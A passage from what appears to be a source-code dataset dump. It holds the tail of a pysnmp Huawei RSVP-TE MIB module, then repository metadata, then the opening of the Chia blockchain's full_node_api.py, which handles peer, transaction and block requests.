hwRsvpTeResvTSpecRate=hwRsvpTeResvTSpecRate, hwRsvpTeSenderNumber=hwRsvpTeSenderNumber, hwRsvpTeSenderAdspecHopCount=hwRsvpTeSenderAdspecHopCount, hwRsvpTeSessionDestAddrLength=hwRsvpTeSessionDestAddrLength, hwRsvpTeSenderTable=hwRsvpTeSenderTable, hwRsvpTeSenderPolicy=hwRsvpTeSenderPolicy, hwRsvpTeSenderAdspecGuaranteedCtot=hwRsvpTeSenderAdspecGuaranteedCtot, hwRsvpTeResvFwdType=hwRsvpTeResvFwdType, hwRsvpTeNbrEntry=hwRsvpTeNbrEntry, hwRsvpTeSenderHopAddr=hwRsvpTeSenderHopAddr, hwRsvpTeSenderMsgIdSndEpoch=hwRsvpTeSenderMsgIdSndEpoch, hwRsvpTeSenderFrrBandwidth=hwRsvpTeSenderFrrBandwidth, hwRsvpTeSenderTSpecPeakRate=hwRsvpTeSenderTSpecPeakRate, hwRsvpTeSenderAddr=hwRsvpTeSenderAddr, hwRsvpTeSenderFrrHopLimit=hwRsvpTeSenderFrrHopLimit, hwRsvpTeSenderSessionAttrName=hwRsvpTeSenderSessionAttrName, hwRsvpTeResvSenderAddrLength=hwRsvpTeResvSenderAddrLength, hwRsvpTeResvInterface=hwRsvpTeResvInterface, hwRsvpTeResvRsvpHop=hwRsvpTeResvRsvpHop, hwRsvpTeResvFwdExplicit=hwRsvpTeResvFwdExplicit, hwRsvpTeIfTtl=hwRsvpTeIfTtl, hwRsvpTeResvFwdDestAddrLength=hwRsvpTeResvFwdDestAddrLength, hwRsvpTeResvTSpecBurst=hwRsvpTeResvTSpecBurst, hwRsvpTeRroIpAddr=hwRsvpTeRroIpAddr, hwRsvpTeNbrGrRestartTime=hwRsvpTeNbrGrRestartTime, hwRsvpTeResvTSpecMaxTu=hwRsvpTeResvTSpecMaxTu, hwRsvpTeNbr=hwRsvpTeNbr, hwRsvpTeSessionType=hwRsvpTeSessionType, hwRsvpTeIfAuthEnabled=hwRsvpTeIfAuthEnabled, hwRsvpTeFilterSpecLabel=hwRsvpTeFilterSpecLabel, PYSNMP_MODULE_ID=hwRsvpTe, hwRsvpTeResvFwdNumber=hwRsvpTeResvFwdNumber, hwRsvpTeExtendObjects=hwRsvpTeExtendObjects, hwRsvpTeIfName=hwRsvpTeIfName, hwRsvpTeIfSrefreshInterval=hwRsvpTeIfSrefreshInterval, hwRsvpTeSessionLspsNumber=hwRsvpTeSessionLspsNumber, hwRsvpTeSenderAdspecGuaranteedDsum=hwRsvpTeSenderAdspecGuaranteedDsum, hwRsvpTeSenderSessionAttrSetupPrio=hwRsvpTeSenderSessionAttrSetupPrio, hwRsvpTeSenderTSpecRate=hwRsvpTeSenderTSpecRate, hwRsvpTeSenderAdspecGuaranteedDtot=hwRsvpTeSenderAdspecGuaranteedDtot, hwRsvpTeSenderAdspecCtrlLoadSvc=hwRsvpTeSenderAdspecCtrlLoadSvc, hwRsvpTeResvGroup=hwRsvpTeResvGroup, hwRsvpTeSessionGroup=hwRsvpTeSessionGroup, hwRsvpTeRroFlag=hwRsvpTeRroFlag, hwRsvpTeResvExplicit=hwRsvpTeResvExplicit, hwRsvpTeIfNbrThreshold=hwRsvpTeIfNbrThreshold, hwRsvpTeRroTable=hwRsvpTeRroTable, hwRsvpTeRroType=hwRsvpTeRroType, hwRsvpTeSenderDestAddr=hwRsvpTeSenderDestAddr, hwRsvpTeEroEntry=hwRsvpTeEroEntry, hwRsvpTeSenderAdspecCtrlLoadPathBw=hwRsvpTeSenderAdspecCtrlLoadPathBw, hwRsvpTeResvFwdGroup=hwRsvpTeResvFwdGroup, hwRsvpTeTrapObjectsGroup=hwRsvpTeTrapObjectsGroup, hwRsvpTeResvTable=hwRsvpTeResvTable, hwRsvpTeIfRefreshMultiple=hwRsvpTeIfRefreshMultiple, hwRsvpTeSenderGroup=hwRsvpTeSenderGroup, hwRsvpTeFilterSpecGroup=hwRsvpTeFilterSpecGroup, hwRsvpTeEroGroup=hwRsvpTeEroGroup, hwRsvpTeResvSenderAddr=hwRsvpTeResvSenderAddr, hwRsvpTeNbrReceiversNumber=hwRsvpTeNbrReceiversNumber, hwRsvpTeNbrReliabilityEnabled=hwRsvpTeNbrReliabilityEnabled, hwRsvpTeNbrHelloEnabled=hwRsvpTeNbrHelloEnabled, hwRsvpTeNbrGrCapability=hwRsvpTeNbrGrCapability, hwRsvpTeResvTtl=hwRsvpTeResvTtl, hwRsvpTeSenderSessionAttrFlag=hwRsvpTeSenderSessionAttrFlag, hwRsvpTeResvTSpecMinTu=hwRsvpTeResvTSpecMinTu, hwRsvpTeSenderMsgIdRcvEpoch=hwRsvpTeSenderMsgIdRcvEpoch, hwRsvpTeIfWindowSize=hwRsvpTeIfWindowSize, hwRsvpTeSenderDiffServPsc=hwRsvpTeSenderDiffServPsc, hwRsvpTeMessageIdEpoch=hwRsvpTeMessageIdEpoch, hwRsvpTeNbrTable=hwRsvpTeNbrTable, hwRsvpTeNbrGrStatus=hwRsvpTeNbrGrStatus, hwRsvpTeSenderLabelRequestFrMaxDlci=hwRsvpTeSenderLabelRequestFrMaxDlci, hwRsvpTeSessionReceivers=hwRsvpTeSessionReceivers, hwRsvpTeResvFwdScope=hwRsvpTeResvFwdScope, hwRsvpTeSenderAdspecMtu=hwRsvpTeSenderAdspecMtu, hwRsvpTeSenderMsgIdSndFlag=hwRsvpTeSenderMsgIdSndFlag, hwRsvpTeSenderAdspecGuaranteedBreak=hwRsvpTeSenderAdspecGuaranteedBreak, hwRsvpTeResvTSpecPeakRate=hwRsvpTeResvTSpecPeakRate, hwRsvpTeIfRetranIncDelta=hwRsvpTeIfRetranIncDelta, hwRsvpTeSenderFrrFlag=hwRsvpTeSenderFrrFlag, hwRsvpTeResvFwdInterface=hwRsvpTeResvFwdInterface, hwRsvpTeSenderTtl=hwRsvpTeSenderTtl, hwRsvpTeSenderAdspecMinLatency=hwRsvpTeSenderAdspecMinLatency, hwRsvpTeResvFwdTtl=hwRsvpTeResvFwdTtl, hwRsvpTeSenderLabelRequestAtmMinVci=hwRsvpTeSenderLabelRequestAtmMinVci, hwRsvpTeResvFwdService=hwRsvpTeResvFwdService, hwRsvpTeSenderInterface=hwRsvpTeSenderInterface, hwRsvpTeSenderInterval=hwRsvpTeSenderInterval, hwRsvpTeResvFwdRsvpHop=hwRsvpTeResvFwdRsvpHop, hwRsvpTeEroIpPrefixLen=hwRsvpTeEroIpPrefixLen, hwRsvpTeResvFwdEntry=hwRsvpTeResvFwdEntry, hwRsvpTeLspId=hwRsvpTeLspId, hwRsvpTeResvFwdRSpecSlack=hwRsvpTeResvFwdRSpecSlack, hwRsvpTeResvRSpecSlack=hwRsvpTeResvRSpecSlack, hwRsvpTeResvFwdInterval=hwRsvpTeResvFwdInterval, hwRsvpTeResvFwdHopAddr=hwRsvpTeResvFwdHopAddr, hwRsvpTeSenderAdspecCtrlLoadBreak=hwRsvpTeSenderAdspecCtrlLoadBreak, hwRsvpTeResvFwdPolicy=hwRsvpTeResvFwdPolicy, hwRsvpTeConformance=hwRsvpTeConformance, hwRsvpTeSenderAdspecBreak=hwRsvpTeSenderAdspecBreak, hwRsvpTeResvFwdTSpecBurst=hwRsvpTeResvFwdTSpecBurst, hwRsvpTeResvFwdMsgIdNumber=hwRsvpTeResvFwdMsgIdNumber, hwRsvpTeExtendTrap=hwRsvpTeExtendTrap, hwRsvpTeAuthSuccess=hwRsvpTeAuthSuccess, hwRsvpTeFilterSpecNumber=hwRsvpTeFilterSpecNumber, hwRsvpTeIfNbrTotalCountExceed=hwRsvpTeIfNbrTotalCountExceed, hwRsvpTeSenderFrrSetupPrio=hwRsvpTeSenderFrrSetupPrio, hwRsvpTeResvHopLih=hwRsvpTeResvHopLih, hwRsvpTeIfEnabled=hwRsvpTeIfEnabled, hwRsvpTeIfTable=hwRsvpTeIfTable, hwRsvpTeIfHelloEnabled=hwRsvpTeIfHelloEnabled, hwRsvpTeIfAuthLifeTime=hwRsvpTeIfAuthLifeTime, hwRsvpTeSenderMsgIdRcvNumber=hwRsvpTeSenderMsgIdRcvNumber, hwRsvpTeResvFwdTSpecRate=hwRsvpTeResvFwdTSpecRate, hwRsvpTeSenderAdspecGuaranteedPathBw=hwRsvpTeSenderAdspecGuaranteedPathBw, hwRsvpTeResvDestAddrLength=hwRsvpTeResvDestAddrLength, hwRsvpTeNbrHelloLostCounter=hwRsvpTeNbrHelloLostCounter, hwRsvpTeSenderAdspecCtrlLoadHopCount=hwRsvpTeSenderAdspecCtrlLoadHopCount, hwRsvpTeHelloLost=hwRsvpTeHelloLost, hwRsvpTeIfUdpRequired=hwRsvpTeIfUdpRequired, hwRsvpTeNbrReductionEnabled=hwRsvpTeNbrReductionEnabled, hwRsvpTeSessionStyle=hwRsvpTeSessionStyle, hwRsvpTeNbrAddress=hwRsvpTeNbrAddress, hwRsvpTeNbrHelloType=hwRsvpTeNbrHelloType, hwRsvpTeSessionTunnelId=hwRsvpTeSessionTunnelId, hwRsvpTeIfSrefreshEnabled=hwRsvpTeIfSrefreshEnabled, hwRsvpTeEroNumber=hwRsvpTeEroNumber, hwRsvpTeSenderAdspecGuaranteedCsum=hwRsvpTeSenderAdspecGuaranteedCsum, hwRsvpTeSenderSessionAttrHoldPrio=hwRsvpTeSenderSessionAttrHoldPrio, hwRsvpTeSenderLabelRequestAtmMaxVci=hwRsvpTeSenderLabelRequestAtmMaxVci, hwRsvpTeSenderHopLih=hwRsvpTeSenderHopLih, hwRsvpTeFilterSpecLspId=hwRsvpTeFilterSpecLspId, hwRsvpTeSenderSessionAttrIncludeAll=hwRsvpTeSenderSessionAttrIncludeAll, hwRsvpTeSenderLabelRequestL3pid=hwRsvpTeSenderLabelRequestL3pid, hwRsvpTeSenderAdspecGuaranteedMtu=hwRsvpTeSenderAdspecGuaranteedMtu, hwRsvpTeResvNumber=hwRsvpTeResvNumber, hwRsvpTeTrapObjects=hwRsvpTeTrapObjects, hwRsvpTeResvFwdMsgIdEpoch=hwRsvpTeResvFwdMsgIdEpoch, hwRsvpTeSenderDestAddrLength=hwRsvpTeSenderDestAddrLength, hwRsvpTeIfAuthHandshake=hwRsvpTeIfAuthHandshake, hwRsvpTeSenderTSpecMaxTu=hwRsvpTeSenderTSpecMaxTu, hwRsvpTeSenderLabelRequestCtype=hwRsvpTeSenderLabelRequestCtype, hwRsvpTeObjects=hwRsvpTeObjects, hwRsvpTeIfNbrThresholdExceed=hwRsvpTeIfNbrThresholdExceed, hwRsvpTeResvFwdMsgIdFlag=hwRsvpTeResvFwdMsgIdFlag, hwRsvpTeResvInterval=hwRsvpTeResvInterval, hwRsvpTeSessionTunnelExtId=hwRsvpTeSessionTunnelExtId, hwRsvpTeMessageIdGroup=hwRsvpTeMessageIdGroup, hwRsvpTeSenderTSpecMinTu=hwRsvpTeSenderTSpecMinTu, hwRsvpTeResvRSpecRate=hwRsvpTeResvRSpecRate, hwRsvpTeSenderFrrHoldPrio=hwRsvpTeSenderFrrHoldPrio, hwRsvpTeResvFwdTSpecMinTu=hwRsvpTeResvFwdTSpecMinTu, hwRsvpTeNbrSendersNumber=hwRsvpTeNbrSendersNumber, hwRsvpTeIfEntry=hwRsvpTeIfEntry, hwRsvpTeSenderAdspecGuaranteedSvc=hwRsvpTeSenderAdspecGuaranteedSvc, hwRsvpTeMessageIdEntry=hwRsvpTeMessageIdEntry, hwRsvpTeFilterSpecEntry=hwRsvpTeFilterSpecEntry, hwRsvpTeTrap=hwRsvpTeTrap, hwRsvpTeNbrStatus=hwRsvpTeNbrStatus, hwRsvpTeSenderAdspecCtrlLoadMinLatency=hwRsvpTeSenderAdspecCtrlLoadMinLatency, hwRsvpTeIfNbrs=hwRsvpTeIfNbrs, hwRsvpTeIfNbrThresholdExceedClear=hwRsvpTeIfNbrThresholdExceedClear, hwRsvpTeResvHopAddr=hwRsvpTeResvHopAddr, hwRsvpTeSenderLabelRequestAtmMinVpi=hwRsvpTeSenderLabelRequestAtmMinVpi, hwRsvpTeSenderAddrLength=hwRsvpTeSenderAddrLength)
| true
| true
|
790da6315d54ab39b87b78c2b6aab8546c002052
| 72,148
|
py
|
Python
|
chia/full_node/full_node_api.py
|
AppleOfEnlightenment/chia-blockchain
|
d3f2ae367d00cf20360c7d7a177f941ea53ecbcb
|
[
"Apache-2.0"
] | null | null | null |
chia/full_node/full_node_api.py
|
AppleOfEnlightenment/chia-blockchain
|
d3f2ae367d00cf20360c7d7a177f941ea53ecbcb
|
[
"Apache-2.0"
] | null | null | null |
chia/full_node/full_node_api.py
|
AppleOfEnlightenment/chia-blockchain
|
d3f2ae367d00cf20360c7d7a177f941ea53ecbcb
|
[
"Apache-2.0"
] | null | null | null |
import asyncio
import dataclasses
import time
import traceback
from secrets import token_bytes
from typing import Dict, List, Optional, Tuple, Set
from blspy import AugSchemeMPL, G2Element
from chiabip158 import PyBIP158
import chia.server.ws_connection as ws
from chia.consensus.block_creation import create_unfinished_block
from chia.consensus.block_record import BlockRecord
from chia.consensus.pot_iterations import calculate_ip_iters, calculate_iterations_quality, calculate_sp_iters
from chia.full_node.bundle_tools import best_solution_generator_from_template, simple_solution_generator
from chia.full_node.full_node import FullNode
from chia.full_node.mempool_check_conditions import get_puzzle_and_solution_for_coin
from chia.full_node.signage_point import SignagePoint
from chia.protocols import farmer_protocol, full_node_protocol, introducer_protocol, timelord_protocol, wallet_protocol
from chia.protocols.full_node_protocol import RejectBlock, RejectBlocks
from chia.protocols.protocol_message_types import ProtocolMessageTypes
from chia.protocols.wallet_protocol import (
PuzzleSolutionResponse,
RejectHeaderBlocks,
RejectHeaderRequest,
CoinState,
RespondSESInfo,
)
from chia.server.outbound_message import Message, make_msg
from chia.types.blockchain_format.coin import Coin, hash_coin_list
from chia.types.blockchain_format.pool_target import PoolTarget
from chia.types.blockchain_format.program import Program
from chia.types.blockchain_format.sized_bytes import bytes32
from chia.types.blockchain_format.sub_epoch_summary import SubEpochSummary
from chia.types.coin_record import CoinRecord
from chia.types.end_of_slot_bundle import EndOfSubSlotBundle
from chia.types.full_block import FullBlock
from chia.types.generator_types import BlockGenerator
from chia.types.mempool_inclusion_status import MempoolInclusionStatus
from chia.types.mempool_item import MempoolItem
from chia.types.peer_info import PeerInfo
from chia.types.transaction_queue_entry import TransactionQueueEntry
from chia.types.unfinished_block import UnfinishedBlock
from chia.util.api_decorators import api_request, peer_required, bytes_required, execute_task, reply_type
from chia.util.generator_tools import get_block_header
from chia.util.hash import std_hash
from chia.util.ints import uint8, uint32, uint64, uint128
from chia.util.merkle_set import MerkleSet
class FullNodeAPI:
full_node: FullNode
def __init__(self, full_node) -> None:
self.full_node = full_node
@property
def server(self):
return self.full_node.server
@property
def log(self):
return self.full_node.log
@property
def api_ready(self):
return self.full_node.initialized
@peer_required
@api_request
@reply_type([ProtocolMessageTypes.respond_peers])
async def request_peers(self, _request: full_node_protocol.RequestPeers, peer: ws.WSChiaConnection):
if peer.peer_server_port is None:
return None
peer_info = PeerInfo(peer.peer_host, peer.peer_server_port)
if self.full_node.full_node_peers is not None:
msg = await self.full_node.full_node_peers.request_peers(peer_info)
return msg
@peer_required
@api_request
async def respond_peers(
self, request: full_node_protocol.RespondPeers, peer: ws.WSChiaConnection
) -> Optional[Message]:
self.log.debug(f"Received {len(request.peer_list)} peers")
if self.full_node.full_node_peers is not None:
await self.full_node.full_node_peers.respond_peers(request, peer.get_peer_info(), True)
return None
@peer_required
@api_request
async def respond_peers_introducer(
self, request: introducer_protocol.RespondPeersIntroducer, peer: ws.WSChiaConnection
) -> Optional[Message]:
self.log.debug(f"Received {len(request.peer_list)} peers from introducer")
if self.full_node.full_node_peers is not None:
await self.full_node.full_node_peers.respond_peers(request, peer.get_peer_info(), False)
await peer.close()
return None
@execute_task
@peer_required
@api_request
async def new_peak(self, request: full_node_protocol.NewPeak, peer: ws.WSChiaConnection) -> Optional[Message]:
"""
A peer notifies us that they have added a new peak to their blockchain. If we don't have it,
we can ask for it.
"""
# this semaphore limits the number of tasks that can call new_peak() at
# the same time, since it can be expensive
waiter_count = len(self.full_node.new_peak_sem._waiters)
if waiter_count > 0:
self.full_node.log.debug(f"new_peak Waiters: {waiter_count}")
if waiter_count > 20:
return None
async with self.full_node.new_peak_sem:
return await self.full_node.new_peak(request, peer)
@peer_required
@api_request
async def new_transaction(
self, transaction: full_node_protocol.NewTransaction, peer: ws.WSChiaConnection
) -> Optional[Message]:
"""
A peer notifies us of a new transaction.
Requests a full transaction if we haven't seen it previously, and if the fees are enough.
"""
# Ignore if syncing
if self.full_node.sync_store.get_sync_mode():
return None
if not (await self.full_node.synced()):
return None
# Ignore if already seen
if self.full_node.mempool_manager.seen(transaction.transaction_id):
return None
if self.full_node.mempool_manager.is_fee_enough(transaction.fees, transaction.cost):
# If there's current pending request just add this peer to the set of peers that have this tx
if transaction.transaction_id in self.full_node.full_node_store.pending_tx_request:
if transaction.transaction_id in self.full_node.full_node_store.peers_with_tx:
current_set = self.full_node.full_node_store.peers_with_tx[transaction.transaction_id]
if peer.peer_node_id in current_set:
return None
current_set.add(peer.peer_node_id)
return None
else:
new_set = set()
new_set.add(peer.peer_node_id)
self.full_node.full_node_store.peers_with_tx[transaction.transaction_id] = new_set
return None
self.full_node.full_node_store.pending_tx_request[transaction.transaction_id] = peer.peer_node_id
new_set = set()
new_set.add(peer.peer_node_id)
self.full_node.full_node_store.peers_with_tx[transaction.transaction_id] = new_set
async def tx_request_and_timeout(full_node: FullNode, transaction_id, task_id):
counter = 0
try:
while True:
# Limit to asking to a few peers, it's possible that this tx got included on chain already
# Highly unlikely that the peers that advertised a tx don't respond to a request. Also, if we
# drop some transactions, we don't want to refetch too many times
if counter == 5:
break
if transaction_id not in full_node.full_node_store.peers_with_tx:
break
peers_with_tx: Set = full_node.full_node_store.peers_with_tx[transaction_id]
if len(peers_with_tx) == 0:
break
peer_id = peers_with_tx.pop()
assert full_node.server is not None
if peer_id not in full_node.server.all_connections:
continue
peer = full_node.server.all_connections[peer_id]
request_tx = full_node_protocol.RequestTransaction(transaction.transaction_id)
msg = make_msg(ProtocolMessageTypes.request_transaction, request_tx)
await peer.send_message(msg)
await asyncio.sleep(5)
counter += 1
if full_node.mempool_manager.seen(transaction_id):
break
except asyncio.CancelledError:
pass
finally:
# Always Cleanup
if transaction_id in full_node.full_node_store.peers_with_tx:
full_node.full_node_store.peers_with_tx.pop(transaction_id)
if transaction_id in full_node.full_node_store.pending_tx_request:
full_node.full_node_store.pending_tx_request.pop(transaction_id)
if task_id in full_node.full_node_store.tx_fetch_tasks:
full_node.full_node_store.tx_fetch_tasks.pop(task_id)
task_id: bytes32 = bytes32(token_bytes(32))
fetch_task = asyncio.create_task(
tx_request_and_timeout(self.full_node, transaction.transaction_id, task_id)
)
self.full_node.full_node_store.tx_fetch_tasks[task_id] = fetch_task
return None
return None
@api_request
@reply_type([ProtocolMessageTypes.respond_transaction])
async def request_transaction(self, request: full_node_protocol.RequestTransaction) -> Optional[Message]:
"""Peer has requested a full transaction from us."""
# Ignore if syncing
if self.full_node.sync_store.get_sync_mode():
return None
spend_bundle = self.full_node.mempool_manager.get_spendbundle(request.transaction_id)
if spend_bundle is None:
return None
transaction = full_node_protocol.RespondTransaction(spend_bundle)
msg = make_msg(ProtocolMessageTypes.respond_transaction, transaction)
return msg
@peer_required
@api_request
@bytes_required
async def respond_transaction(
self,
tx: full_node_protocol.RespondTransaction,
peer: ws.WSChiaConnection,
tx_bytes: bytes = b"",
test: bool = False,
) -> Optional[Message]:
"""
Receives a full transaction from peer.
If tx is added to mempool, send tx_id to others. (new_transaction)
"""
assert tx_bytes != b""
spend_name = std_hash(tx_bytes)
if spend_name in self.full_node.full_node_store.pending_tx_request:
self.full_node.full_node_store.pending_tx_request.pop(spend_name)
if spend_name in self.full_node.full_node_store.peers_with_tx:
self.full_node.full_node_store.peers_with_tx.pop(spend_name)
if self.full_node.transaction_queue.qsize() % 100 == 0 and not self.full_node.transaction_queue.empty():
self.full_node.log.debug(f"respond_transaction Waiters: {self.full_node.transaction_queue.qsize()}")
if self.full_node.transaction_queue.full():
self.full_node.dropped_tx.add(spend_name)
return None
# Higher fee means priority is a smaller number, which means it will be handled earlier
await self.full_node.transaction_queue.put(
(0, TransactionQueueEntry(tx.transaction, tx_bytes, spend_name, peer, test))
)
return None
@api_request
@reply_type([ProtocolMessageTypes.respond_proof_of_weight])
async def request_proof_of_weight(self, request: full_node_protocol.RequestProofOfWeight) -> Optional[Message]:
if self.full_node.weight_proof_handler is None:
return None
if not self.full_node.blockchain.contains_block(request.tip):
self.log.error(f"got weight proof request for unknown peak {request.tip}")
return None
if request.tip in self.full_node.pow_creation:
event = self.full_node.pow_creation[request.tip]
await event.wait()
wp = await self.full_node.weight_proof_handler.get_proof_of_weight(request.tip)
else:
event = asyncio.Event()
self.full_node.pow_creation[request.tip] = event
wp = await self.full_node.weight_proof_handler.get_proof_of_weight(request.tip)
event.set()
tips = list(self.full_node.pow_creation.keys())
if len(tips) > 4:
# Remove old from cache
for i in range(0, 4):
self.full_node.pow_creation.pop(tips[i])
if wp is None:
self.log.error(f"failed creating weight proof for peak {request.tip}")
return None
# Serialization of wp is slow
if (
self.full_node.full_node_store.serialized_wp_message_tip is not None
and self.full_node.full_node_store.serialized_wp_message_tip == request.tip
):
return self.full_node.full_node_store.serialized_wp_message
message = make_msg(
ProtocolMessageTypes.respond_proof_of_weight, full_node_protocol.RespondProofOfWeight(wp, request.tip)
)
self.full_node.full_node_store.serialized_wp_message_tip = request.tip
self.full_node.full_node_store.serialized_wp_message = message
return message
@api_request
async def respond_proof_of_weight(self, request: full_node_protocol.RespondProofOfWeight) -> Optional[Message]:
self.log.warning("Received proof of weight too late.")
return None
@api_request
@reply_type([ProtocolMessageTypes.respond_block, ProtocolMessageTypes.reject_block])
async def request_block(self, request: full_node_protocol.RequestBlock) -> Optional[Message]:
if not self.full_node.blockchain.contains_height(request.height):
reject = RejectBlock(request.height)
msg = make_msg(ProtocolMessageTypes.reject_block, reject)
return msg
header_hash: Optional[bytes32] = self.full_node.blockchain.height_to_hash(request.height)
if header_hash is None:
return make_msg(ProtocolMessageTypes.reject_block, RejectBlock(request.height))
block: Optional[FullBlock] = await self.full_node.block_store.get_full_block(header_hash)
if block is not None:
if not request.include_transaction_block and block.transactions_generator is not None:
block = dataclasses.replace(block, transactions_generator=None)
return make_msg(ProtocolMessageTypes.respond_block, full_node_protocol.RespondBlock(block))
return make_msg(ProtocolMessageTypes.reject_block, RejectBlock(request.height))
@api_request
@reply_type([ProtocolMessageTypes.respond_blocks, ProtocolMessageTypes.reject_blocks])
async def request_blocks(self, request: full_node_protocol.RequestBlocks) -> Optional[Message]:
if request.end_height < request.start_height or request.end_height - request.start_height > 32:
reject = RejectBlocks(request.start_height, request.end_height)
msg: Message = make_msg(ProtocolMessageTypes.reject_blocks, reject)
return msg
for i in range(request.start_height, request.end_height + 1):
if not self.full_node.blockchain.contains_height(uint32(i)):
reject = RejectBlocks(request.start_height, request.end_height)
msg = make_msg(ProtocolMessageTypes.reject_blocks, reject)
return msg
if not request.include_transaction_block:
blocks: List[FullBlock] = []
for i in range(request.start_height, request.end_height + 1):
header_hash_i: Optional[bytes32] = self.full_node.blockchain.height_to_hash(uint32(i))
if header_hash_i is None:
reject = RejectBlocks(request.start_height, request.end_height)
return make_msg(ProtocolMessageTypes.reject_blocks, reject)
block: Optional[FullBlock] = await self.full_node.block_store.get_full_block(header_hash_i)
if block is None:
reject = RejectBlocks(request.start_height, request.end_height)
return make_msg(ProtocolMessageTypes.reject_blocks, reject)
block = dataclasses.replace(block, transactions_generator=None)
blocks.append(block)
msg = make_msg(
ProtocolMessageTypes.respond_blocks,
full_node_protocol.RespondBlocks(request.start_height, request.end_height, blocks),
)
else:
blocks_bytes: List[bytes] = []
for i in range(request.start_height, request.end_height + 1):
header_hash_i = self.full_node.blockchain.height_to_hash(uint32(i))
if header_hash_i is None:
reject = RejectBlocks(request.start_height, request.end_height)
return make_msg(ProtocolMessageTypes.reject_blocks, reject)
block_bytes: Optional[bytes] = await self.full_node.block_store.get_full_block_bytes(header_hash_i)
if block_bytes is None:
reject = RejectBlocks(request.start_height, request.end_height)
msg = make_msg(ProtocolMessageTypes.reject_blocks, reject)
return msg
blocks_bytes.append(block_bytes)
respond_blocks_manually_streamed: bytes = (
bytes(uint32(request.start_height))
+ bytes(uint32(request.end_height))
+ len(blocks_bytes).to_bytes(4, "big", signed=False)
)
for block_bytes in blocks_bytes:
respond_blocks_manually_streamed += block_bytes
msg = make_msg(ProtocolMessageTypes.respond_blocks, respond_blocks_manually_streamed)
return msg
@api_request
async def reject_block(self, request: full_node_protocol.RejectBlock):
self.log.debug(f"reject_block {request.height}")
@api_request
async def reject_blocks(self, request: full_node_protocol.RejectBlocks):
self.log.debug(f"reject_blocks {request.start_height} {request.end_height}")
@api_request
async def respond_blocks(self, request: full_node_protocol.RespondBlocks) -> None:
self.log.warning("Received unsolicited/late blocks")
return None
@api_request
@peer_required
async def respond_block(
self,
respond_block: full_node_protocol.RespondBlock,
peer: ws.WSChiaConnection,
) -> Optional[Message]:
"""
Receive a full block from a peer full node (or ourselves).
"""
self.log.warning(f"Received unsolicited/late block from peer {peer.get_peer_logging()}")
return None
@api_request
async def new_unfinished_block(
self, new_unfinished_block: full_node_protocol.NewUnfinishedBlock
) -> Optional[Message]:
# Ignore if syncing
if self.full_node.sync_store.get_sync_mode():
return None
block_hash = new_unfinished_block.unfinished_reward_hash
if self.full_node.full_node_store.get_unfinished_block(block_hash) is not None:
return None
# This prevents us from downloading the same block from many peers
if block_hash in self.full_node.full_node_store.requesting_unfinished_blocks:
return None
msg = make_msg(
ProtocolMessageTypes.request_unfinished_block,
full_node_protocol.RequestUnfinishedBlock(block_hash),
)
self.full_node.full_node_store.requesting_unfinished_blocks.add(block_hash)
# However, we want to eventually download from other peers, if this peer does not respond
# Todo: keep track of who it was
async def eventually_clear():
await asyncio.sleep(5)
if block_hash in self.full_node.full_node_store.requesting_unfinished_blocks:
self.full_node.full_node_store.requesting_unfinished_blocks.remove(block_hash)
asyncio.create_task(eventually_clear())
return msg
@api_request
@reply_type([ProtocolMessageTypes.respond_unfinished_block])
async def request_unfinished_block(
self, request_unfinished_block: full_node_protocol.RequestUnfinishedBlock
) -> Optional[Message]:
unfinished_block: Optional[UnfinishedBlock] = self.full_node.full_node_store.get_unfinished_block(
request_unfinished_block.unfinished_reward_hash
)
if unfinished_block is not None:
msg = make_msg(
ProtocolMessageTypes.respond_unfinished_block,
full_node_protocol.RespondUnfinishedBlock(unfinished_block),
)
return msg
return None
@peer_required
@api_request
@bytes_required
async def respond_unfinished_block(
self,
respond_unfinished_block: full_node_protocol.RespondUnfinishedBlock,
peer: ws.WSChiaConnection,
respond_unfinished_block_bytes: bytes = b"",
) -> Optional[Message]:
if self.full_node.sync_store.get_sync_mode():
return None
await self.full_node.respond_unfinished_block(
respond_unfinished_block, peer, block_bytes=respond_unfinished_block_bytes
)
return None
@api_request
@peer_required
async def new_signage_point_or_end_of_sub_slot(
self, new_sp: full_node_protocol.NewSignagePointOrEndOfSubSlot, peer: ws.WSChiaConnection
) -> Optional[Message]:
# Ignore if syncing
if self.full_node.sync_store.get_sync_mode():
return None
if (
self.full_node.full_node_store.get_signage_point_by_index(
new_sp.challenge_hash,
new_sp.index_from_challenge,
new_sp.last_rc_infusion,
)
is not None
):
return None
if self.full_node.full_node_store.have_newer_signage_point(
new_sp.challenge_hash, new_sp.index_from_challenge, new_sp.last_rc_infusion
):
return None
if new_sp.index_from_challenge == 0 and new_sp.prev_challenge_hash is not None:
if self.full_node.full_node_store.get_sub_slot(new_sp.prev_challenge_hash) is None:
collected_eos = []
challenge_hash_to_request = new_sp.challenge_hash
last_rc = new_sp.last_rc_infusion
num_non_empty_sub_slots_seen = 0
for _ in range(30):
if num_non_empty_sub_slots_seen >= 3:
self.log.debug("Diverged from peer. Don't have the same blocks")
return None
# If this is an end of sub slot, and we don't have the prev, request the prev instead
# We want to catch up to the latest slot so we can receive signage points
full_node_request = full_node_protocol.RequestSignagePointOrEndOfSubSlot(
challenge_hash_to_request, uint8(0), last_rc
)
response = await peer.request_signage_point_or_end_of_sub_slot(full_node_request, timeout=10)
if not isinstance(response, full_node_protocol.RespondEndOfSubSlot):
self.full_node.log.debug(f"Invalid response for slot {response}")
return None
collected_eos.append(response)
if (
self.full_node.full_node_store.get_sub_slot(
response.end_of_slot_bundle.challenge_chain.challenge_chain_end_of_slot_vdf.challenge
)
is not None
or response.end_of_slot_bundle.challenge_chain.challenge_chain_end_of_slot_vdf.challenge
== self.full_node.constants.GENESIS_CHALLENGE
):
for eos in reversed(collected_eos):
await self.respond_end_of_sub_slot(eos, peer)
return None
if (
response.end_of_slot_bundle.challenge_chain.challenge_chain_end_of_slot_vdf.number_of_iterations
!= response.end_of_slot_bundle.reward_chain.end_of_slot_vdf.number_of_iterations
):
num_non_empty_sub_slots_seen += 1
challenge_hash_to_request = (
response.end_of_slot_bundle.challenge_chain.challenge_chain_end_of_slot_vdf.challenge
)
last_rc = response.end_of_slot_bundle.reward_chain.end_of_slot_vdf.challenge
self.full_node.log.warning("Failed to catch up in sub-slots")
return None
if new_sp.index_from_challenge > 0:
if (
new_sp.challenge_hash != self.full_node.constants.GENESIS_CHALLENGE
and self.full_node.full_node_store.get_sub_slot(new_sp.challenge_hash) is None
):
# If this is a normal signage point,, and we don't have the end of sub slot, request the end of sub slot
full_node_request = full_node_protocol.RequestSignagePointOrEndOfSubSlot(
new_sp.challenge_hash, uint8(0), new_sp.last_rc_infusion
)
return make_msg(ProtocolMessageTypes.request_signage_point_or_end_of_sub_slot, full_node_request)
